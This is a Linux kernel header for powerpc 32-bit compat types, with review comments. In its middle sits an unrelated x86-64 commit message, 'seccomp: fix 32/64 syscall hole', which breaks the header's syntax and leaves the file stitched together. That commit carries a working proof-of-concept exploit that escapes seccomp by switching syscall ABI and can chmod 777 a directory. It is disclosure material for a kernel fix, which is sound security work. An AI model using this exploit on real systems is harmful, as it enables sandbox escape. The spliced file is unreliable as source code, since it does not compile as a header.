# ifndef _ASM_POWERPC_COMPAT_H
# define _ASM_POWERPC_COMPAT_H
# ifdef __KERNEL__
/*
* Architecture specific compatibility types
*/
# include <linux/types.h>
# include <linux/sched.h>
/*
 * Values presented to compat tasks.
 * NOTE(review): the meanings (USER_HZ tick rate, utsname machine string)
 * are inferred from the names only; confirm against the generic compat code.
 */
#define COMPAT_USER_HZ		100
#define COMPAT_UTS_MACHINE	"ppc\0\0"

/*
 * Scalar types as laid out for compat tasks. Every alias names an explicit
 * fixed-width kernel type, so its size does not follow the native word size.
 */
typedef u32		compat_size_t;
typedef s32		compat_ssize_t;
typedef s32		compat_time_t;
typedef s32		compat_clock_t;
typedef s32		compat_pid_t;

/* User and group ids: all four variants are 32 bits wide here. */
typedef u32		__compat_uid_t;
typedef u32		__compat_gid_t;
typedef u32		__compat_uid32_t;
typedef u32		__compat_gid32_t;

/* File-system related types. Note the narrow ones: s16 link count, s32 offset. */
typedef u32		compat_mode_t;
typedef u32		compat_ino_t;
typedef u32		compat_dev_t;
typedef s32		compat_off_t;
typedef s64		compat_loff_t;
typedef s16		compat_nlink_t;
typedef u16		compat_ipc_pid_t;
typedef s32		compat_daddr_t;
typedef u32		compat_caddr_t;
typedef __kernel_fsid_t	compat_fsid_t;
typedef s32		compat_key_t;
typedef s32		compat_timer_t;

/* Plain integers: int and long are both 32 bits in the compat layout. */
typedef s32		compat_int_t;
typedef s32		compat_long_t;
typedef s64		compat_s64;
typedef u32		compat_uint_t;
typedef u32		compat_ulong_t;
typedef u64		compat_u64;

/*
 * A user-space pointer as a 32-bit integer value. It is not a pointer type:
 * convert with compat_ptr() / ptr_to_compat() rather than casting by hand.
 */
typedef u32		compat_uptr_t;
/*
 * Seconds/nanoseconds pair in the compat layout.
 * tv_sec is a compat_time_t and tv_nsec an s32, i.e. two 32-bit signed
 * fields when compat_time_t is s32 as typedef'd in this header.
 */
struct compat_timespec {
	compat_time_t	tv_sec;
	s32		tv_nsec;
};
/*
 * Seconds/microseconds pair in the compat layout.
 * Same shape as struct compat_timespec, with tv_usec in place of tv_nsec.
 */
struct compat_timeval {
	compat_time_t	tv_sec;
	s32		tv_usec;
};
/*
 * stat result in the compat layout.
 *
 * st_size, st_blksize and st_blocks are compat_off_t (s32 in this header)
 * and st_nlink is compat_nlink_t (s16), so native values that need more
 * bits cannot be represented in this structure.
 * NOTE(review): the code that fills this structure is outside this header;
 * confirm it reports an error for out-of-range values instead of silently
 * truncating them.
 */
struct compat_stat {
	compat_dev_t		st_dev;
	compat_ino_t		st_ino;
	compat_mode_t		st_mode;
	compat_nlink_t		st_nlink;
	__compat_uid32_t	st_uid;
	__compat_gid32_t	st_gid;
	compat_dev_t		st_rdev;
	compat_off_t		st_size;
	compat_off_t		st_blksize;
	compat_off_t		st_blocks;
	/* Each timestamp is a seconds field followed by its nanoseconds part. */
	compat_time_t		st_atime;
	u32			st_atime_nsec;
	compat_time_t		st_mtime;
	u32			st_mtime_nsec;
	compat_time_t		st_ctime;
	u32			st_ctime_nsec;
	/* Trailing padding words. */
	u32			__unused4[2];
};
/*
 * File-lock description in the compat layout, with 32-bit offsets:
 * l_start and l_len are compat_off_t. See struct compat_flock64 for the
 * variant with 64-bit offsets.
 */
struct compat_flock {
	short		l_type;
	short		l_whence;
	compat_off_t	l_start;
	compat_off_t	l_len;
	compat_pid_t	l_pid;
};
/* fcntl commands that operate on the 64-bit lock layout. */
#define F_GETLK64	12	/* using 'struct flock64' */
#define F_SETLK64	13
#define F_SETLKW64	14

/*
 * File-lock description in the compat layout, with 64-bit offsets:
 * identical to struct compat_flock except that l_start and l_len are
 * compat_loff_t.
 */
struct compat_flock64 {
	short		l_type;
	short		l_whence;
	compat_loff_t	l_start;
	compat_loff_t	l_len;
	compat_pid_t	l_pid;
};
/*
 * statfs result in the compat layout.
 *
 * All counters are plain int, so large block or inode counts from the
 * native structure may not fit.
 * NOTE(review): overflow handling lives in the code that fills this
 * structure, outside this header; confirm it there.
 */
struct compat_statfs {
	int		f_type;
	int		f_bsize;
	int		f_blocks;
	int		f_bfree;
	int		f_bavail;
	int		f_files;
	int		f_ffree;
	compat_fsid_t	f_fsid;
	int		f_namelen;	/* SunOS ignores this field. */
	int		f_frsize;
	int		f_flags;
	int		f_spare[4];	/* spare words */
};
/*
 * Resource-limit "infinity" markers for compat tasks: the old value is the
 * largest positive 32-bit signed number, the current one is all 32 bits set.
 */
#define COMPAT_RLIM_OLD_INFINITY	0x7fffffff
#define COMPAT_RLIM_INFINITY		0xffffffff

/* The old-style signal set is a single 32-bit word. */
typedef u32 compat_old_sigset_t;

/*
 * Signal-set geometry for compat tasks.
 * NOTE(review): reading _BPW as "bits per word" gives 64 / 32 = 2 words of
 * compat_sigset_word per set; confirm against the users of these macros.
 */
#define _COMPAT_NSIG		64
#define _COMPAT_NSIG_BPW	32

typedef u32 compat_sigset_word;
/*
 * Signal payload in the compat layout: either an integer or a user
 * pointer. sival_ptr is a compat_uptr_t, i.e. a 32-bit integer value that
 * must be widened with compat_ptr() before it is treated as a pointer.
 */
typedef union compat_sigval {
	compat_int_t	sival_int;
	compat_uptr_t	sival_ptr;
} compat_sigval_t;
/*
 * Number of ints in the siginfo payload union: 128 bytes' worth of int,
 * less the three leading header ints (si_signo, si_errno, si_code).
 */
#define SI_PAD_SIZE32	(128 / sizeof(int) - 3)

/*
 * siginfo in the compat layout: three header ints followed by a union
 * whose valid member depends on the kind of signal.
 *
 * NOTE(review): only one union member is meaningful per signal. Code that
 * copies this structure to user space (outside this header) should be
 * checked to make sure the bytes of the union it did not fill are not
 * uninitialised kernel memory.
 */
typedef struct compat_siginfo {
	int si_signo;
	int si_errno;
	int si_code;

	union {
		/* Fixes the size of the union. */
		int _pad[SI_PAD_SIZE32];

		/* kill() */
		struct {
			compat_pid_t	_pid;	/* sender's pid */
			__compat_uid_t	_uid;	/* sender's uid */
		} _kill;

		/* POSIX.1b timers */
		struct {
			compat_timer_t	_tid;		/* timer id */
			int		_overrun;	/* overrun count */
			compat_sigval_t	_sigval;	/* same as below */
			int		_sys_private;	/* not to be passed to user */
		} _timer;

		/* POSIX.1b signals */
		struct {
			compat_pid_t	_pid;	/* sender's pid */
			__compat_uid_t	_uid;	/* sender's uid */
			compat_sigval_t	_sigval;
		} _rt;

		/* SIGCHLD */
		struct {
			compat_pid_t	_pid;	/* which child */
			__compat_uid_t	_uid;	/* sender's uid */
			int		_status;	/* exit code */
			compat_clock_t	_utime;
			compat_clock_t	_stime;
		} _sigchld;

		/* SIGILL, SIGFPE, SIGSEGV, SIGBUS, SIGEMT */
		struct {
			/* An unsigned int here, not a pointer type. */
			unsigned int	_addr;	/* faulting insn/memory ref. */
		} _sigfault;

		/* SIGPOLL */
		struct {
			int	_band;	/* POLL_IN, POLL_OUT, POLL_MSG */
			int	_fd;
		} _sigpoll;
	} _sifields;
} compat_siginfo_t;
/*
 * Largest positive values of a 32-bit and a 64-bit signed integer; by
 * their names, the upper bounds for compat_off_t and compat_loff_t.
 */
#define COMPAT_OFF_T_MAX	0x7fffffff
#define COMPAT_LOFF_T_MAX	0x7fffffffffffffffL
/*
 * Widen a pointer passed in from user mode as a 32-bit value (for example
 * a field of a compat structure) into a native __user pointer.
 *
 * This should not be used for syscall parameters: just declare those as
 * pointers, because the syscall entry code will have appropriately
 * converted them already.
 *
 * The conversion is only a widening cast. It performs no validation, so
 * the result is still an untrusted user address and may only be accessed
 * through the user-access helpers (copy_from_user(), get_user(), ...).
 */
static inline void __user *compat_ptr(compat_uptr_t uptr)
{
	unsigned long addr = uptr;

	return (void __user *)addr;
}
/*
 * Narrow a native __user pointer to its 32-bit compat representation.
 *
 * The cast keeps only the low 32 bits and does not check that the upper
 * bits were zero, so it is only lossless for addresses below 4 GiB.
 * NOTE(review): presumably callers only pass addresses belonging to a
 * 32-bit task; confirm at the call sites.
 */
static inline compat_uptr_t ptr_to_compat(void __user *uptr)
{
	unsigned long addr = (unsigned long)uptr;

	return (u32)addr;
}
/*
 * Compute a user-space address @len bytes below the current task's user
 * stack pointer (gpr[1] of the saved registers), for use as scratch space.
 *
 * This helper only does the arithmetic. @len is a signed long and is not
 * range-checked here, and the result is not validated: a negative or
 * oversized @len simply wraps the subtraction. The caller must bound @len
 * and verify the returned range (e.g. with access_ok()) before using it.
 */
static inline void __user *arch_compat_alloc_user_space(long len)
{
	unsigned long sp = current->thread.regs->gpr[1];

	/*
	 * We can't access below the stack pointer in the 32bit ABI and
	 * can access 288 bytes in the 64bit ABI, so a task that is not
	 * 32-bit gets those 288 bytes skipped first.
	 */
	unsigned long skip = is_32bit_task() ? 0 : 288;

	return (void __user *)(sp - skip - len);
}
/*
 * IPC permission block in the compat layout.
 *
 * ipc64_perm is actually 32/64 bit clean, but since the compat layer
 * refers to it we may as well define it.
 */
struct compat_ipc64_perm {
	compat_key_t	key;
	__compat_uid_t	uid;
	__compat_gid_t	gid;
	__compat_uid_t	cuid;
	__compat_gid_t	cgid;
	compat_mode_t	mode;
	unsigned int	seq;
	unsigned int	__pad2;
	/* yes they really are 64bit pads */
	unsigned long	__unused1;
	unsigned long	__unused2;
};
/*
 * Semaphore-set descriptor in the compat layout.
 *
 * Each compat_time_t field is preceded by an unsigned int pad.
 * NOTE(review): presumably the pad reserves the other half of a 64-bit
 * time slot; confirm against the native semid64_ds.
 */
struct compat_semid64_ds {
	struct compat_ipc64_perm	sem_perm;
	unsigned int			__unused1;
	compat_time_t			sem_otime;
	unsigned int			__unused2;
	compat_time_t			sem_ctime;
	compat_ulong_t			sem_nsems;
	compat_ulong_t			__unused3;
	compat_ulong_t			__unused4;
};
/*
 * Message-queue descriptor in the compat layout.
 *
 * Each compat_time_t field is preceded by an unsigned int pad, and the
 * byte/message counters are compat_ulong_t (32-bit).
 * NOTE(review): presumably each pad reserves the other half of a 64-bit
 * time slot; confirm against the native msqid64_ds.
 */
struct compat_msqid64_ds {
	struct compat_ipc64_perm	msg_perm;
	unsigned int			__unused1;
	compat_time_t			msg_stime;
	unsigned int			__unused2;
	compat_time_t			msg_rtime;
	unsigned int			__unused3;
	compat_time_t			msg_ctime;
	compat_ulong_t			msg_cbytes;
	compat_ulong_t			msg_qnum;
	compat_ulong_t			msg_qbytes;
	compat_pid_t			msg_lspid;
	compat_pid_t			msg_lrpid;
	compat_ulong_t			__unused4;
	compat_ulong_t			__unused5;
};
/*
 * Shared-memory segment descriptor in the compat layout.
 *
 * Each compat_time_t field, and shm_segsz, is preceded by an unsigned int
 * pad. shm_segsz is a compat_size_t (u32), so a segment size that needs
 * more than 32 bits cannot be represented in this structure.
 * NOTE(review): confirm how the code that fills this structure (outside
 * this header) handles larger segments.
 */
struct compat_shmid64_ds {
	struct compat_ipc64_perm	shm_perm;
	unsigned int			__unused1;
	compat_time_t			shm_atime;
	unsigned int			__unused2;
	compat_time_t			shm_dtime;
	unsigned int			__unused3;
	compat_time_t			shm_ctime;
	unsigned int			__unused4;
	compat_size_t			shm_segsz;
	compat_pid_t			shm_cpid;
	compat_pid_t			shm_lpid;
	compat_ulong_t			shm_nattch;
	compat_ulong_t			__unused5;
	compat_ulong_t			__unused6;
};
x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process can make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-28 10:25:54 +03:00
/*
 * Report whether the current task is a compat task. In this header the
 * answer is exactly is_32bit_task(): non-zero for a 32-bit task, zero
 * otherwise.
 *
 * NOTE(review): presumably consumed by callers such as seccomp's
 * secure_computing(), which must pick the system-call number table that
 * matches the ABI of the call being made. The test here is per task, not
 * per system call; confirm that a task on this architecture cannot issue
 * system calls of the other ABI, otherwise a per-call test is needed.
 */
static inline int is_compat_task(void)
{
	int compat = is_32bit_task();

	return compat;
}
# endif /* __KERNEL__ */
# endif /* _ASM_POWERPC_COMPAT_H */